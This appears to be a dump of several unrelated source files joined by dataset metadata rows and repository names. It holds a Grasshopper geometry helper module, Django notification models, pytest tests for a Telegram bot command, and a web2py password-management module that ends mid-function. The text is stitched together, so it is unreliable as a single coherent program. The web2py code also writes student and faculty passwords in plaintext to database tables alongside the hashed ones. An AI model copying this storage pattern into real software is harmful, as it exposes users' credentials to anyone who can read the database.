[0.866019308567,0.468421578407,-0.174905076623],
[0.892938017845,0.434652328491,-0.117213711143],
[0.894335091114,0.409316182137,-0.180623859167],
[0.858619451523,0.509656965733,-0.0549761541188],
[0.8796184659,0.475679844618,0.0],
[0.887796461582,0.456712335348,-0.0568443164229],
[0.915323853493,0.398431301117,-0.0586068555713],
[0.932827115059,0.360324263573,0.0],
[0.940329909325,0.334895044565,-0.0602079555392],
[0.887796461582,0.456712335348,-0.0568443164229],
[0.915323853493,0.398431301117,-0.0586068555713],
[0.892938017845,0.434652328491,-0.117213711143],
[0.960443258286,0.199805602431,-0.193975359201],
[0.978907585144,0.158833146095,-0.128498718143],
[0.97295331955,0.121444880962,-0.196501940489],
[0.961880862713,0.266443610191,-0.0615878328681],
[0.974178731441,0.225778326392,0.0],
[0.979053080082,0.193714544177,-0.0626873448491],
[0.991025745869,0.117650069296,-0.0634539350867],
[0.997029185295,0.0770247355103,0.0],
[0.997179210186,0.0394601933658,-0.0638479366899],
[0.979053080082,0.193714544177,-0.0626873448491],
[0.991025745869,0.117650069296,-0.0634539350867],
[0.978907585144,0.158833146095,-0.128498718143],
[0.894335091114,0.409316182137,-0.180623859167],
[0.920180141926,0.34457308054,-0.185843646526],
[0.891307473183,0.380633711815,-0.246351331472],
[0.940329909325,0.334895044565,-0.0602079555392],
[0.961880862713,0.266443610191,-0.0615878328681],
[0.943842172623,0.306287169456,-0.123895764351],
[0.942551255226,0.274516820908,-0.190361812711],
[0.960443258286,0.199805602431,-0.193975359201],
[0.935745954514,0.239766731858,-0.258633822203],
[0.943842172623,0.306287169456,-0.123895764351],
[0.942551255226,0.274516820908,-0.190361812711],
[0.920180141926,0.34457308054,-0.185843646526],
[0.85085272789,-0.276221334934,-0.446935534477],
[0.869839549065,-0.313733518124,-0.380723625422],
[0.830415487289,-0.346611320972,-0.436200261116],
[0.922915279865,-0.202408134937,-0.327503234148],
[0.935745954514,-0.239766731858,-0.258633822203],
[0.905284404755,-0.277958005667,-0.321246802807],
[0.883275330067,-0.348686188459,-0.313436716795],
[0.891307473183,-0.380633711815,-0.246351331472],
[0.857896447182,-0.413926929235,-0.3044308424],
[0.905284404755,-0.277958005667,-0.321246802807],
[0.883275330067,-0.348686188459,-0.313436716795],
[0.869839549065,-0.313733518124,-0.380723625422],
[0.97295331955,-0.121444880962,-0.196501940489],
[0.978907585144,-0.158833146095,-0.128498718143],
[0.960443258286,-0.199805602431,-0.193975359201],
[0.997179210186,-0.0394601933658,-0.0638479366899],
[0.997029185295,-0.0770247355103,0.0],
[0.991025745869,-0.117650069296,-0.0634539350867],
[0.979053080082,-0.193714544177,-0.0626873448491],
[0.974178731441,-0.225778326392,0.0],
[0.961880862713,-0.266443610191,-0.0615878328681],
[0.991025745869,-0.117650069296,-0.0634539350867],
[0.979053080082,-0.193714544177,-0.0626873448491],
[0.978907585144,-0.158833146095,-0.128498718143],
[0.894335091114,-0.409316182137,-0.180623859167],
[0.892938017845,-0.434652328491,-0.117213711143],
[0.866019308567,-0.468421578407,-0.174905076623],
[0.940329909325,-0.334895044565,-0.0602079555392],
[0.932827115059,-0.360324263573,0.0],
[0.915323853493,-0.398431301117,-0.0586068555713],
[0.887796461582,-0.456712335348,-0.0568443164229],
[0.8796184659,-0.475679844618,0.0],
[0.858619451523,-0.509656965733,-0.0549761541188],
[0.915323853493,-0.398431301117,-0.0586068555713],
[0.887796461582,-0.456712335348,-0.0568443164229],
[0.892938017845,-0.434652328491,-0.117213711143],
[0.960443258286,-0.199805602431,-0.193975359201],
[0.942551255226,-0.274516820908,-0.190361812711],
[0.935745954514,-0.239766731858,-0.258633822203],
[0.961880862713,-0.266443610191,-0.0615878328681],
[0.940329909325,-0.334895044565,-0.0602079555392],
[0.943842172623,-0.306287169456,-0.123895764351],
[0.920180141926,-0.34457308054,-0.185843646526],
[0.894335091114,-0.409316182137,-0.180623859167],
[0.891307473183,-0.380633711815,-0.246351331472],
[0.943842172623,-0.306287169456,-0.123895764351],
[0.920180141926,-0.34457308054,-0.185843646526],
[0.942551255226,-0.274516820908,-0.190361812711],
[0.85085272789,0.276221334934,-0.446935534477],
[0.867211103439,0.20109423995,-0.455528259277],
[0.826465010643,0.236761152744,-0.510783493519],
[0.922915279865,0.202408134937,-0.327503234148],
[0.935258030891,0.123069040477,-0.33188316226],
[0.903840482235,0.162998497486,-0.395605653524],
[0.878655850887,0.122248865664,-0.461539924145],
[0.88455080986,0.0410230122507,-0.464636415243],
[0.847858190536,0.0809632539749,-0.524005174637],
[0.903840482235,0.162998497486,-0.395605653524],
[0.878655850887,0.122248865664,-0.461539924145],
[0.867211103439,0.20109423995,-0.455528259277],
[0.97295331955,0.121444880962,-0.196501940489],
[0.979394435883,0.0407496243715,-0.197802826762],
[0.960611641407,0.0820460245013,-0.265506535769],
[0.997179210186,0.0394601933658,-0.0638479366899],
[0.997179210186,-0.0394601933658,-0.0638479366899],
[0.991494178772,0.0,-0.130150929093],
[0.979394435883,-0.0407496243715,-0.197802826762],
[0.97295331955,-0.121444880962,-0.196501940489],
[0.960611641407,-0.0820460245013,-0.265506535769],
[0.991494178772,0.0,-0.130150929093],
[0.979394435883,-0.0407496243715,-0.197802826762],
[0.979394435883,0.0407496243715,-0.197802826762],
[0.88455080986,-0.0410230122507,-0.464636415243],
[0.878655850887,-0.122248865664,-0.461539924145],
[0.847858190536,-0.0809632539749,-0.524005174637],
[0.935258030891,-0.123069040477,-0.33188316226],
[0.922915279865,-0.202408134937,-0.327503234148],
[0.903840482235,-0.162998497486,-0.395605653524],
[0.867211103439,-0.20109423995,-0.455528259277],
[0.85085272789,-0.276221334934,-0.446935534477],
[0.826465010643,-0.236761152744,-0.510783493519],
[0.903840482235,-0.162998497486,-0.395605653524],
[0.867211103439,-0.20109423995,-0.455528259277],
[0.878655850887,-0.122248865664,-0.461539924145],
[0.960611641407,0.0820460245013,-0.265506535769],
[0.941618084908,0.04130198434,-0.334140062332],
[0.935258030891,0.123069040477,-0.33188316226],
[0.960611641407,-0.0820460245013,-0.265506535769],
[0.935258030891,-0.123069040477,-0.33188316226],
[0.941618084908,-0.04130198434,-0.334140062332],
[0.916092038155,0.0,-0.400968074799],
[0.88455080986,-0.0410230122507,-0.464636415243],
[0.88455080986,0.0410230122507,-0.464636415243],
[0.941618084908,-0.04130198434,-0.334140062332],
[0.916092038155,0.0,-0.400968074799],
[0.941618084908,0.04130198434,-0.334140062332]]
return points
class Numbers:
@staticmethod
def isclose(a, b, rel_tol=1e-09, abs_tol=1e-09):
"""check equality within tolerance"""
return abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
class Data:
@staticmethod
def list_to_datatree(raggedList):
"""Python to Grasshopper (from Chen Jingcheng)"""
rl = raggedList
result = DataTree[object]()
for i in range(len(rl)):
tempo = []
for j in range(len(rl[i])):
tempo.append(rl[i][j])
path = GH_Path(i)
result.AddRange(tempo, path)
return result
@staticmethod
def datatree_to_list(aTree):
"""Grasshopper to Python (from Chen Jingcheng)"""
theList = []
for i in range(aTree.BranchCount):
thisListPart = []
thisBranch = aTree.Branch(i)
for j in range(len(thisBranch)):
thisListPart.append( thisBranch[j] )
theList.append(thisListPart)
return theList
@staticmethod
def flatten_integer_list(l):
"""Flatten a nested list of integers"""
if type(l) is list:
new_l=[]
num = None
for i in range(len(str(l))):
char = str(l)[i]
if char != '[' and char != ']' and char!= ' ' and char != ',':
if num == None: num = char
else: num += char
elif num != None:
new_l.append(int(num))
num = None
return(new_l)
else: return l
@staticmethod
def flatten_list(list):
"""Flatten a list of list (not higher degrees!)"""
flatlist = []
for sublist in list:
for item in sublist:
flatlist.append(item)
return flatlist
@staticmethod
def islistsimilar(list1,list2):
"""check if two lists contain the same integers"""
state = False
if len(list1) == len(list2):
sort1=copy.deepcopy(list1)
sort2=copy.deepcopy(list2)
sort1.sort()
sort2.sort()
if sort1 == sort2:
state = True
return state
@staticmethod
def list_of_empty_lists(n):
"""Generate a list of n empty lists"""
list=[]
for i in range(n):
list.append([])
return list
@staticmethod
def sort_list_sync(list_to_sort, key_list):
"""Sort list synchroneously using keys"""
return [list_to_sort[i] for i in key_list]
@staticmethod
def break_list(alist):
"""return list first item if parameter is a list"""
try : return alist[0]
except: return alist
@staticmethod
def seq_to_steps(seq):
step=[]
steps=[]
for i in range(len(str(seq))):
char = str(seq)[i]
if char == '[':
index = 0
step.append(index)
elif char == ']':
del step[-1]
index = 0
elif char == ' ':
pass
elif char == ',':
step[-1] += 1
if char == ',' or char == '[':
steps.append(copy.deepcopy(step))
return(steps)
@staticmethod
def deepest_steps(seq):
step=[]
steps=[]
for i in range(len(str(seq))):
char = str(seq)[i]
if char == '[':
index = 0
step.append(index)
elif char == ']':
del step[-1]
index = 0
elif char == ' ':
pass
elif char == ',':
step[-1] += 1
else:
steps.append(copy.deepcopy(step))
return(steps)
@staticmethod
def get_item_from_path(l, path):
l = copy.deepcopy(l)
if type(path) == list:
for i in range(len(path)):
l = l[path[i]]
return l
@staticmethod
def order_sequence(steps):
#tree as a list of paths
#path as a list of indices
new_steps = []
for step in copy.deepcopy(steps):
depth = 0
ls = len(steps)
# compute current tree depth
for j in range(ls):
if len(steps[j])-1 > depth : depth = len(steps[j])-1
# append current first deepest item
for j in range(ls):
if len(steps[j])-1 == depth :
new_steps.append(steps[j])
del(steps[j])
break
return new_steps
@staticmethod
def seq_to_tree(text):
#sequence as text
seq = ast.literal_eval(text)
deep = Toolbox.Data.deepest_steps(seq)
tree = DataTree[object]()
for i in range(len(deep)):
path = deep[i]
item = Toolbox.Data.get_item_from_path(seq, path)
tree.Add(item, GH_Path(*path))
return tree
@staticmethod
def tree_to_seq(tree):
# get tree paths as list of int
paths = []
parents = []
all_parents = []
for i in range(tree.BranchCount):
path_string = tree.Path(i).ToString()
path = []
num = None
for char in path_string:
if char == '{' or char == ';' or char == '}':
if num != None :
path.append(num)
num = None
else :
if num == None: num = int(char)
else: num = int(str(num) + char)
paths.append(path)
#parents
all_par=[]
if len(path) == 1 :
parents.append('M')
else:
parents.append(path[0:len(path)-1])
for j in range(len(path)-1):
all_par.append(path[0:len(path)-1-j])
all_par.append('M')
all_parents.append(all_par)
# create sequence from paths
seq_as_string = ''
for i in range(len(paths)):
path = paths[i]
#add coma
if i != 0 : seq_as_string += ','
#if parent doesn't exists before, add opening parenthesis
if (parents[i] in parents[0:i]) is False:
#add one parenthesis for each zero in path.
last_zeros = 0
for j in range(len(path)):
if path[j] == 0: last_zeros += 1
else: last_zeros = 0
seq_as_string += '[' * last_zeros
#add number
seq_as_string += str(tree.AllData()[i])
#if parent doesn't exist after, add closing parenthesis
if (parents[i] in parents[i+1:len(parents)]) is False:
#last parenthesis of the sequence
if i+1 == len(paths):
seq_as_string += ']' * len(path)
else:
count = 0
search = True
for j in range(len(all_parents[i])):
if search == True:
for k in range(len(all_parents[i+1])):
if search == True:
if all_parents[i][j] == all_parents[i+1][k]:
count = j
search = False
seq_as_string += ']' * count
return seq_as_string
@staticmethod
def test_seq(seq):
flag = False
if (type(seq) is str):
if len(seq) > 2:
if seq[0] == '[' and seq[-1] == ']':
comas=0
ophook=0
clhook=0
numbers=[]
num = ''
flag = True
for i in range(len(seq)):
if seq[i] == '[' : ophook += 1
elif seq[i] == ']' : clhook += 1
elif seq[i] == ',' : comas += 1
elif seq[i] == ' ': pass
elif seq[i] in ['0','1','2','3','4','5','6','7','8','9'] :
num += seq[i]
if seq[i+1] not in ['0','1','2','3','4','5','6','7','8','9']:
numbers.append(int(num))
num = ''
else: raise Exception( 'Invalid character in sequence.')
if ophook != clhook : raise Exception( 'Missing hook(s) in sequence.')
if comas != len(numbers)-1 : raise Exception( 'Missing coma(s) in sequence.')
#if Toolbox.Data.islistsimilar(numbers, range(min(numbers), min(numbers)+len(numbers))) is False: raise Exception( 'Missing number(s) in sequence.')
else: raise Exception( 'Sequence should start and end with hooks.')
else: raise Exception( 'Sequence should be expressed as a string.')
if flag == False: raise Exception( 'Error is sequence input.')
return flag
@staticmethod
def reorder_sequence(seq):
seq = str(seq)
new_num = range(len(Toolbox.Data.flatten_integer_list(ast.literal_eval(seq))))
new_seq = ''
temp_num = None
count = 0
for i in range(len(seq)):
if seq[i] != '[' and seq[i] != ',' and seq[i] != ']' and seq[i] != ' ':
if temp_num == None: temp_num = seq[i]
else: temp_num += seq[i]
if seq[i+1] != '[' and seq[i+1] != ',' and seq[i+1] != ']' and seq[i+1] != ' ': pass
else:
new_seq += str(new_num[count])
count += 1
else: new_seq += seq[i]
return new_seq
| 60.179757 | 231 | 0.55737 | 50,678 | 520,254 | 5.655807 | 0.027172 | 0.00568 | 0.004176 | 0.003377 | 0.859468 | 0.837631 | 0.817127 | 0.784269 | 0.772176 | 0.765708 | 0 | 0.548754 | 0.313324 | 520,254 | 8,644 | 232 | 60.186719 | 0.253565 | 0.02307 | 0 | 0.763444 | 0 | 0 | 0.006662 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017499 | false | 0.001533 | 0.00115 | 0.001022 | 0.03487 | 0.001022 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
590c6c443827492ae11a0659b384dd4279f8b096 | 4,320 | py | Python | hqq_notice/models.py | yaoruda/DRFLearning | 6b17ef0d557142e8563d80788351f8b7ab94f248 | [
"MIT"
] | 1 | 2018-09-21T09:42:02.000Z | 2018-09-21T09:42:02.000Z | hqq_notice/models.py | yaoruda/DRFLearning | 6b17ef0d557142e8563d80788351f8b7ab94f248 | [
"MIT"
] | null | null | null | hqq_notice/models.py | yaoruda/DRFLearning | 6b17ef0d557142e8563d80788351f8b7ab94f248 | [
"MIT"
] | null | null | null | from django.db import models
from hqq_user.models import MyUser
from hqq_group.models import Group, ApplicationForGroup
from hqq_topic.models import Topic
from hqq_forum.models import Forum
class TextNotice(models.Model):
"""
通知
"""
id = models.CharField(max_length=32, verbose_name='主键', primary_key=True)
user = models.ForeignKey(MyUser, on_delete=models.CASCADE, verbose_name='接收者')
title = models.CharField(max_length=50, verbose_name='通知内容')
text = models.CharField(max_length=100, verbose_name='通知内容')
state = models.SmallIntegerField(
verbose_name='状态',
choices=((0, '正常'), (1, '删除')),
default=0
)
create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
update_time = models.DateTimeField(auto_now=True, verbose_name='更新时间')
delete_mark = models.SmallIntegerField(
verbose_name='删除标记',
choices=((0, '正常'), (1, '删除')),
default=0
)
class ApplyGroupNotice(models.Model):
"""
加群通知
"""
id = models.CharField(max_length=32, verbose_name='主键', primary_key=True)
user = models.ForeignKey(MyUser, on_delete=models.CASCADE, verbose_name='接收者')
title = models.CharField(max_length=50, verbose_name='通知内容')
text = models.CharField(max_length=100, verbose_name='通知内容')
application = models.ForeignKey(ApplicationForGroup, on_delete=models.CASCADE, verbose_name='群信息')
apply_state = models.SmallIntegerField(
verbose_name='审核状态',
choices=((0, '待审核'), (1, '同意'), (2, '拒绝')),
default=0
)
state = models.SmallIntegerField(
verbose_name='状态',
choices=((0, '正常'), (1, '删除')),
default=0
)
create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
update_time = models.DateTimeField(auto_now=True, verbose_name='更新时间')
delete_mark = models.SmallIntegerField(
verbose_name='删除标记',
choices=((0, '正常'), (1, '删除')),
default=0
)
class JumpGroupNotice(models.Model):
"""
跳转到群的通知
"""
id = models.CharField(max_length=32, verbose_name='主键', primary_key=True)
user = models.ForeignKey(MyUser, on_delete=models.CASCADE, verbose_name='接收者')
title = models.CharField(max_length=50, verbose_name='通知内容')
text = models.CharField(max_length=100, verbose_name='通知内容')
group = models.ForeignKey(Group, on_delete=models.CASCADE, verbose_name='群聊')
state = models.SmallIntegerField(
verbose_name='状态',
choices=((0, '正常'), (1, '删除')),
default=0
)
create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
update_time = models.DateTimeField(auto_now=True, verbose_name='更新时间')
delete_mark = models.SmallIntegerField(
verbose_name='删除标记',
choices=((0, '正常'), (1, '删除')),
default=0
)
class JumpTopicNotice(models.Model):
"""
跳转到全部话题界面的通知
"""
id = models.CharField(max_length=32, verbose_name='主键', primary_key=True)
title = models.CharField(max_length=50, verbose_name='通知内容')
text = models.CharField(max_length=100, verbose_name='通知内容')
topic = models.ForeignKey(Topic, on_delete=models.CASCADE, verbose_name='群聊')
state = models.SmallIntegerField(
verbose_name='状态',
choices=((0, '正常'), (1, '删除')),
default=0
)
create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
update_time = models.DateTimeField(auto_now=True, verbose_name='更新时间')
delete_mark = models.SmallIntegerField(
verbose_name='删除标记',
choices=((0, '正常'), (1, '删除')),
default=0
)
class TextNoticeToAll(models.Model):
"""
全员通知
"""
id = models.CharField(max_length=32, verbose_name='主键', primary_key=True)
title = models.CharField(max_length=50, verbose_name='通知内容')
text = models.CharField(max_length=100, verbose_name='通知内容')
state = models.SmallIntegerField(
verbose_name='状态',
choices=((0, '正常'), (1, '删除')),
default=0
)
create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
update_time = models.DateTimeField(auto_now=True, verbose_name='更新时间')
delete_mark = models.SmallIntegerField(
verbose_name='删除标记',
choices=((0, '正常'), (1, '删除')),
default=0
)
| 35.409836 | 102 | 0.660648 | 527 | 4,320 | 5.220114 | 0.140417 | 0.167939 | 0.098146 | 0.130862 | 0.834969 | 0.820792 | 0.80916 | 0.80916 | 0.80916 | 0.80916 | 0 | 0.019822 | 0.194213 | 4,320 | 121 | 103 | 35.702479 | 0.770468 | 0.007639 | 0 | 0.71875 | 0 | 0 | 0.044408 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052083 | 0 | 0.541667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
594793a7cbbb69f64c8be10bea2b40c18a1a3fba | 7,447 | py | Python | tests/test_send_ko.py | Izeren/dr_tg | 862c996200177e033149152e33985bfb114c758d | [
"Apache-2.0"
] | 1 | 2021-11-11T15:05:46.000Z | 2021-11-11T15:05:46.000Z | tests/test_send_ko.py | Izeren/dr_tg | 862c996200177e033149152e33985bfb114c758d | [
"Apache-2.0"
] | 40 | 2020-10-09T21:13:54.000Z | 2021-12-02T00:54:31.000Z | tests/test_send_ko.py | Izeren/pewpewbot | 862c996200177e033149152e33985bfb114c758d | [
"Apache-2.0"
] | null | null | null | from asyncio import Future
import pytest
from mock import Mock, call
from pytest_mock import MockerFixture
from model_parsing_utils import parse_koline_from_string
from pewpewbot.commands_processing import send_ko, process_tip
from tests.mock_utils import mock_manager, get_pin_message_to_mock_tip_for_manager_with_ko, mock_message, \
KOLINE_DEFAULT_PARSED, KOLINE_MULTISECTOR_BONUS_CODE_UP
@pytest.mark.asyncio
async def test_with_caption_no_tip(mocker: MockerFixture):
# given
message_mock = mock_message('/ko')
manager_mock = mock_manager(KOLINE_DEFAULT_PARSED)
full_view_mock = mocker.patch('pewpewbot.views.sector_default_ko_message', return_value='mocked_view')
# when
await send_ko(message_mock, manager_mock, **{'command_name': 'ko', 'ko_caption': 'mocked_caption\n'})
# then
full_view_mock.assert_called_once_with(manager_mock.state.koline.sectors[0])
message_mock.reply.assert_called_once_with('mocked_caption\nmocked_view\n', parse_mode='Markdown')
@pytest.mark.asyncio
async def test_with_caption_with_tip(mocker: MockerFixture):
# given
message_mock = mock_message('/ko')
manager_mock = mock_manager()
pin_message_mock = get_pin_message_to_mock_tip_for_manager_with_ko(manager=manager_mock)
future_koline = Future()
future_koline.set_result(manager_mock.state.koline)
manager_mock.get_or_load_and_parse_koline = Mock(return_value=future_koline)
full_view_mock = mocker.patch('pewpewbot.views.sector_with_tips_ko_message', return_value='mocked_view')
# when
await process_tip(pin_message_mock, manager_mock, **{'command_name': 'tip'})
await send_ko(message_mock, manager_mock, **{'command_name': 'ko', 'ko_caption': 'mocked_caption\n'})
# then
full_view_mock.assert_called_once_with(manager_mock.state.koline.sectors[0], manager_mock.state.tip[0])
message_mock.reply.assert_called_once_with('mocked_caption\nmocked_view\n', parse_mode='Markdown')
@pytest.mark.asyncio
async def test_no_caption_no_tip(mocker: MockerFixture):
# given
message_mock = mock_message('/ko')
manager_mock = mock_manager(KOLINE_DEFAULT_PARSED)
full_view_mock = mocker.patch('pewpewbot.views.sector_default_ko_message', return_value='mocked_view')
# when
await send_ko(message_mock, manager_mock, **{'command_name': 'ko'})
# then
full_view_mock.assert_called_once_with(manager_mock.state.koline.sectors[0])
message_mock.reply.assert_called_once_with('mocked_view\n', parse_mode='Markdown')
@pytest.mark.asyncio
async def test_no_caption_with_tip(mocker: MockerFixture):
# given
message_mock = mock_message('/ko')
manager_mock = mock_manager()
pin_message_mock = get_pin_message_to_mock_tip_for_manager_with_ko(manager=manager_mock)
future_koline = Future()
future_koline.set_result(manager_mock.state.koline)
manager_mock.get_or_load_and_parse_koline = Mock(return_value=future_koline)
full_view_mock = mocker.patch('pewpewbot.views.sector_with_tips_ko_message', return_value='mocked_view')
# when
await process_tip(pin_message_mock, manager_mock, **{'command_name': 'tip'})
await send_ko(message_mock, manager_mock, **{'command_name': 'ko'})
# then
full_view_mock.assert_called_once_with(manager_mock.state.koline.sectors[0], manager_mock.state.tip[0])
message_mock.reply.assert_called_once_with('mocked_view\n', parse_mode='Markdown')
@pytest.mark.asyncio
async def test_with_caption_with_tip_multi_sector(mocker: MockerFixture):
# given
message_mock = mock_message('/ko')
manager_mock = mock_manager()
pin_message_mock = get_pin_message_to_mock_tip_for_manager_with_ko(
koline=parse_koline_from_string(KOLINE_MULTISECTOR_BONUS_CODE_UP),
manager=manager_mock
)
future_koline = Future()
future_koline.set_result(manager_mock.state.koline)
manager_mock.get_or_load_and_parse_koline = Mock(return_value=future_koline)
full_view_mock = mocker.patch('pewpewbot.views.sector_with_tips_ko_message', return_value='mocked_view')
# when
await process_tip(pin_message_mock, manager_mock, **{'command_name': 'tip'})
await send_ko(message_mock, manager_mock, **{'command_name': 'ko', 'ko_caption': 'mocked_caption\n'})
# then
full_view_mock.has_calls([
call(manager_mock.state.koline.sectors[0], manager_mock.state.tip[0]),
call(manager_mock.state.koline.sectors[1], manager_mock.state.tip[1]),
])
message_mock.reply.assert_called_once_with('mocked_caption\nmocked_view\nmocked_view\n', parse_mode='Markdown')
@pytest.mark.asyncio
async def test_no_caption_with_tip_multi_sector(mocker: MockerFixture):
# given
message_mock = mock_message('/ko')
manager_mock = mock_manager()
pin_message_mock = get_pin_message_to_mock_tip_for_manager_with_ko(
koline=parse_koline_from_string(KOLINE_MULTISECTOR_BONUS_CODE_UP),
manager=manager_mock
)
future_koline = Future()
future_koline.set_result(manager_mock.state.koline)
manager_mock.get_or_load_and_parse_koline = Mock(return_value=future_koline)
full_view_mock = mocker.patch('pewpewbot.views.sector_with_tips_ko_message', return_value='mocked_view')
# when
await process_tip(pin_message_mock, manager_mock, **{'command_name': 'tip'})
await send_ko(message_mock, manager_mock, **{'command_name': 'ko'})
# then
full_view_mock.has_calls([
call(manager_mock.state.koline.sectors[0], manager_mock.state.tip[0]),
call(manager_mock.state.koline.sectors[1], manager_mock.state.tip[1]),
])
message_mock.reply.assert_called_once_with('mocked_view\nmocked_view\n', parse_mode='Markdown')
@pytest.mark.asyncio
async def test_with_caption_no_tip_multi_sector(mocker: MockerFixture):
# given
message_mock = mock_message('/ko')
manager_mock = mock_manager(parse_koline_from_string(KOLINE_MULTISECTOR_BONUS_CODE_UP))
future_koline = Future()
future_koline.set_result(manager_mock.state.koline)
manager_mock.get_or_load_and_parse_koline = Mock(return_value=future_koline)
full_view_mock = mocker.patch('pewpewbot.views.sector_default_ko_message', return_value='mocked_view')
# when
await send_ko(message_mock, manager_mock, **{'command_name': 'ko', 'ko_caption': 'mocked_caption\n'})
# then
full_view_mock.has_calls([
call(manager_mock.state.koline.sectors[0]),
call(manager_mock.state.koline.sectors[1]),
])
message_mock.reply.assert_called_once_with('mocked_caption\nmocked_view\nmocked_view\n', parse_mode='Markdown')
@pytest.mark.asyncio
async def test_no_caption_no_tip_multi_sector(mocker: MockerFixture):
# given
message_mock = mock_message('/ko')
manager_mock = mock_manager(parse_koline_from_string(KOLINE_MULTISECTOR_BONUS_CODE_UP))
future_koline = Future()
future_koline.set_result(manager_mock.state.koline)
manager_mock.get_or_load_and_parse_koline = Mock(return_value=future_koline)
full_view_mock = mocker.patch('pewpewbot.views.sector_default_ko_message', return_value='mocked_view')
# when
await send_ko(message_mock, manager_mock, **{'command_name': 'ko'})
# then
full_view_mock.has_calls([
call(manager_mock.state.koline.sectors[0]),
call(manager_mock.state.koline.sectors[1]),
])
message_mock.reply.assert_called_once_with('mocked_view\nmocked_view\n', parse_mode='Markdown')
| 42.554286 | 115 | 0.770377 | 1,059 | 7,447 | 4.96695 | 0.07271 | 0.112928 | 0.073004 | 0.075285 | 0.951331 | 0.946008 | 0.946008 | 0.946008 | 0.946008 | 0.946008 | 0 | 0.002758 | 0.123674 | 7,447 | 174 | 116 | 42.798851 | 0.803249 | 0.017054 | 0 | 0.844828 | 0 | 0 | 0.138177 | 0.072653 | 0 | 0 | 0 | 0 | 0.103448 | 1 | 0 | false | 0 | 0.060345 | 0 | 0.060345 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3cedfb20fc9d244746c196a98e91a8300f72ffd1 | 8,117 | py | Python | web2py/applications/smc/modules/ednet/w2py.py | aduckworth1969/smc | b1771d9ed68f0e35f46271aab5b1e1fab363e3d9 | [
"MIT"
] | 1 | 2018-04-19T05:09:06.000Z | 2018-04-19T05:09:06.000Z | web2py/applications/smc/modules/ednet/w2py.py | aduckworth1969/smc | b1771d9ed68f0e35f46271aab5b1e1fab363e3d9 | [
"MIT"
] | 14 | 2018-03-04T22:56:41.000Z | 2020-12-10T19:49:43.000Z | web2py/applications/smc/modules/ednet/w2py.py | aduckworth1969/smc | b1771d9ed68f0e35f46271aab5b1e1fab363e3d9 | [
"MIT"
] | 2 | 2020-09-18T15:12:26.000Z | 2020-11-10T22:09:59.000Z | # -*- coding: utf-8 -*-
from gluon import *
from gluon import current
from .appsettings import AppSettings
# Web2PyAPIClass
class W2Py:
def __init__(self):
pass
@staticmethod
def Test():
return "test"
@staticmethod
def SetStudentPassword(user_name, new_password, update_db=True):
db = current.db
ret = False
# Get the auth_user id
# USE LIKE TO SUPPORT CASE INSENSTIVE MATCHES
rows = db(db.auth_user.username.like(user_name)).select()
for row in rows:
id = row['id']
# Set password in info table
if update_db is True:
db(db.student_info.account_id == id).update(student_password=new_password)
# Set Web2py password
db(db.auth_user.id == id).update(password=db.auth_user.password.validate(new_password)[0])
ret = True
return ret
@staticmethod
def SetFacultyPassword(user_name, new_password, update_db=True):
db = current.db
ret = False
#print("PW: " + user_name + str(update_db) + new_password)
# Get the auth_user id
# USE LIKE TO SUPPORT CASE INSENSTIVE MATCHES
rows = db(db.auth_user.username.like(user_name)).select()
for row in rows:
id = row['id']
# Set password in info table
if update_db is True:
db(db.faculty_info.account_id == id).update(faculty_password=new_password)
# Set Web2py password
db(db.auth_user.id == id).update(password=db.auth_user.password.validate(new_password)[0])
ret = True
return ret
@staticmethod
def CreateW2PStudentUser(user_name, password, user_email, first_name, last_name, user_ad_quota, user_canvas_quota,
row):
db = current.db # Grab the current db object
auth = current.auth # Grab the current auth object
# Load the user if it already exists
user = db(db.student_info.user_id == row.user_id).select().first()
if user is None:
# User doesn't exist, create it
# Create the new user in web2py
uid = db.auth_user.insert(last_name=last_name,
first_name=first_name,
username=user_name,
password=db.auth_user.password.validate(password)[0],
email=user_email
)
# Put the user in the students group
auth.add_membership('Students', uid)
default_ad_quota = user_ad_quota
default_canvas_quota = user_canvas_quota
# Move the rest of the info in place
db.student_info.insert(
account_id=uid,
user_id=row.user_id,
student_name=row.student_name,
student_password=password,
import_classes=row.import_classes,
program=row.program,
additional_fields=row.additional_fields,
sheet_name=row.sheet_name,
student_guid=row.student_guid,
account_enabled=row.account_enabled,
account_added_on=row.account_updated_on,
account_updated_on=row.account_updated_on,
student_ad_quota=default_ad_quota,
student_canvas_quota=default_canvas_quota
)
pass
else:
# Student exists, update web2py info
db(db.auth_user.id == user.account_id).update(
last_name=last_name,
first_name=first_name,
username=user_name,
# Don't overwrite existing password, GetPasswordForStudent
# Should have returned the current password so this is ok.
password=db.auth_user.password.validate(password)[0],
email=user_email
)
# Update user info
user.update_record(
student_name=row.student_name,
student_password=password,
import_classes=row.import_classes,
program=row.program,
additional_fields=row.additional_fields,
sheet_name=row.sheet_name,
account_enabled=row.account_enabled,
account_updated_on=row.account_updated_on,
student_ad_quota=user_ad_quota,
student_canvas_quota=user_canvas_quota
)
# Make sure the user in the students group
auth.add_membership('Students', user.account_id)
pass
@staticmethod
def CreateW2PFacultyUser(user_name, password, user_email, first_name, last_name, user_ad_quota, user_canvas_quota,
row):
db = current.db # Grab the current db object
auth = current.auth # Grab the current auth object
# Load the user if it already exists
